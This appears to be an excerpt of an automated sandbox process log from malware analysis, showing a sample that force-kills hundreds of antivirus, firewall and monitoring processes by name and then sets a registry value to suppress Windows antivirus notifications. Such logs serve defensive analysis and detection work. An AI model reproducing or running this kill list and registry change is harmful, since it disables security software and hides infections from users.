C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iamapp.exe4⤵PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iamserv.exe4⤵PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iamstats.exe4⤵PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ibmasn.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ibmavsp.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im icload95.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im icloadnt.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im icmon.exe4⤵
- Kills process with taskkill
PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im icsupp95.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im icsuppnt.exe4⤵PID:692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iface.exe4⤵PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ifw2000.exe4⤵PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im inoculateit.exe4⤵PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iomon98.exe4⤵PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iparmor.exe4⤵PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im iris.exe4⤵PID:996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isrv95.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im jammer.exe4⤵PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im jedi.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kavpf.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ldnetmon.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ldpromenu.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ldscan.exe4⤵PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im localnet.exe4⤵
- Kills process with taskkill
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lockdown.exe4⤵PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lookout.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im luall.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lucomserver.exe4⤵PID:1072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im luspt.exe4⤵PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcafee.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcagent.exe4⤵PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcmnhdlr.exe4⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcshield.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcshieldvvstat.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mctool.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcupdate.exe4⤵PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcvsrte.exe4⤵PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcvsshld.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mgavrtcl.exe4⤵PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mgavrte.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghtml.exe4⤵PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mgui.exe4⤵PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im minilog.exe4⤵PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mon.exe4⤵PID:360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im monitor.exe4⤵PID:536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im monsys32.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im monsysnt.exe4⤵
- Kills process with taskkill
PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im moolive.exe4⤵PID:1932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfservice.exe4⤵PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpftray.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mrflux.exe4⤵PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo32.exe4⤵PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mwatch.exe4⤵PID:476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mxtask.exe4⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im n32scanw.exe4⤵
- Kills process with taskkill
PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nav.exe4⤵PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NAV DefAlert.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nav32.exe4⤵PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navalert.exe4⤵PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navap.exe4⤵PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navapsvc.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NAVAPW32.exe4⤵PID:888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navauto -protect.exe4⤵PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navdx.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navengnavex15.exe4⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navlu32.exe4⤵PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navnt.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navrunr.exe4⤵PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navstub.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navw32.exe4⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Navwnt.exe4⤵PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nc2000.exe4⤵PID:776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ndd32.exe4⤵PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im neomonitor.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im neowatchlog.exe4⤵PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im net2000.exe4⤵PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netarmor.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netcommando.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netinfo.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netmon.exe4⤵PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netpro.exe4⤵PID:2024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netprotect.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netscanpro.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netspyhunter -1.2.exe4⤵PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netstat.exe4⤵
- Kills process with taskkill
PID:308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netutils.exe4⤵PID:1648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im netutils].exe4⤵PID:1788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nimda.exe4⤵PID:824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisserv.exe4⤵PID:1140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisum.exe4⤵
- Kills process with taskkill
PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisumnisservnisum.exe4⤵PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nmain.exe4⤵
- Kills process with taskkill
PID:1208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32.exe4⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norman.exe4⤵PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norman_32.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norman_av.exe4⤵PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norman32.exe4⤵PID:928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im normanav.exe4⤵PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im normist.exe4⤵PID:1092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton.exe4⤵PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Norton Auto-Protect.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton_av.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nortonav.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im notstart.exe4⤵PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfmessenger.exe4⤵PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfw.exe4⤵PID:1292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfw32.exe4⤵PID:536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nprotect.exe4⤵
- Kills process with taskkill
PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npscheck.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npssvc.exe4⤵
- Kills process with taskkill
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nresq32.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nsched32.exe4⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nschednt.exe4⤵PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nsplugin.exe4⤵PID:776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ntrtscan.exe4⤵PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ntvdm.exe4⤵PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ntxconfig.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nui.exe4⤵PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nupgrade.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvarch16.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvc95.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvsvc32.exe4⤵
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nwservice.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nwtool16.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im offguard.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OPScan.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ostronet.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outpost.exe4⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im padmin.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im panda.exe4⤵PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pandaav.exe4⤵PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im panixk.exe4⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pav.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavcl.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavproxy.exe4⤵PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavsched.exe4⤵PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavw.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pc -cillan.exe4⤵PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pc -cillin.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccclient.exe4⤵PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccguide.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pcciomon.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccntmon.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccwin97.exe4⤵PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccwin98.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pcfwallicon.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pcscan.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im periscope.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im persfw.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pf2.exe4⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pfwadmin.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pingscan.exe4⤵PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im platin.exe4⤵
- Kills process with taskkill
PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pop3trap.exe4⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im poproxy.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im portdetective.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im portmonitor.exe4⤵PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ppinupdt.exe4⤵PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pptbc.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ppvstop.exe4⤵PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im processmonitor.exe4⤵
- Kills process with taskkill
PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im procexplorerv10#.exe4⤵PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im programauditor.exe4⤵PID:2024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im proport.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im protectx.exe4⤵PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pspf.exe4⤵
- Kills process with taskkill
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im purge.exe4⤵PID:308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pview95.exe4⤵PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pw32.exe4⤵PID:880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im qconsole.exe4⤵PID:824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rav.exe4⤵PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rav7.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rav7win.exe4⤵PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im realmon.exe4⤵PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regrun2.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rescue.exe4⤵PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rrguard.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rshell.exe4⤵PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rtvscn95.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rulaunch.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safeweb.exe4⤵
- Kills process with taskkill
PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SAVscan.exe4⤵PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sbserv.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SBservice.exe4⤵
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scan.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scan32.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scan95.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scanpm.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scrscan.exe4⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sd.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SENS.exe4⤵PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im serv95.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sfc.exe4⤵PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sh.exe4⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sharedaccess.exe4⤵
- Kills process with taskkill
PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im shn.exe4⤵PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im smc.exe4⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sofi.exe4⤵PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sophos.exe4⤵
- Kills process with taskkill
PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sophos_av.exe4⤵PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sophosav.exe4⤵PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spf.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sphinx.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spy.exe4⤵PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spygate.exe4⤵PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spyx.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spyxx.exe4⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im srwatch.exe4⤵PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ss3edit.exe4⤵PID:880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im st2.exe4⤵PID:1220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supftrl.exe4⤵PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supp95.exe4⤵PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supporter5.exe4⤵PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweep95.exe4⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepnet.exe4⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepsrv.sys.exe4⤵PID:996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepsrv.sysvshwin32.exe4⤵PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im swnetsup.exe4⤵PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symantec.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Symantec Core LC.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symlcsvc.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symproxysvc.exe4⤵PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symtray.exe4⤵PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysedit.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmon.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taumon.exe4⤵PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tauscan.exe4⤵PID:360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tbscan.exe4⤵
- Kills process with taskkill
PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tcm.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tctca.exe4⤵
- Kills process with taskkill
PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds -3.exe4⤵
- Kills process with taskkill
PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds2 -98.exe4⤵PID:1220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds2 -nt.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tfak.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tfak5.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tgbob.exe4⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trendmicro.exe4⤵PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trjscan.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trojantrap3.exe4⤵PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TrueVector.exe4⤵PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im undoboot.exe4⤵PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im update.exe4⤵PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbcmserv.exe4⤵PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbcons.exe4⤵PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbust.exe4⤵PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbwin9x.exe4⤵PID:2024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbwinntw.exe4⤵PID:1128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vccmserv.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vcontrol.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vet32.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vet95.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vettray.exe4⤵
- Kills process with taskkill
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vir -help.exe4⤵PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virus.exe4⤵PID:1220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virusmdpersonalfirewall.exe4⤵PID:692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vnlan300.exe4⤵PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vnpc3000.exe4⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vpc32.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vpfw30s.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vptray.exe4⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vscan40.exe4⤵PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsched.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsecomr.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vshwin32.exe4⤵PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vshwin32vbcmserv.exe4⤵PID:1092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsmain.exe4⤵PID:1216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsmon.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsstat.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vswin9xe.exe4⤵PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vswinntse.exe4⤵
- Kills process with taskkill
PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im w9x.exe4⤵PID:900
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im watchdog.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webscanx.exe4⤵PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webtrap.exe4⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wfindv32.exe4⤵PID:1828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wgfe95.exe4⤵PID:1208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im whoswatchingme.exe4⤵PID:476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wimmun32.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winrecon.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winroute.exe4⤵
- Kills process with taskkill
PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winsfcm.exe4⤵
- Kills process with taskkill
PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wnt.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wqkmm3878.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wradmin.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wrctrl.exe4⤵PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wsbgate.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wyvernworksfirewall.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zapro.exe4⤵PID:1292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zatutor.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zauinst.exe4⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe4⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v AntiVirusDisableNotify /t REG_DWORD /d 4 /f4⤵
- Windows security bypass
PID:756
-
-
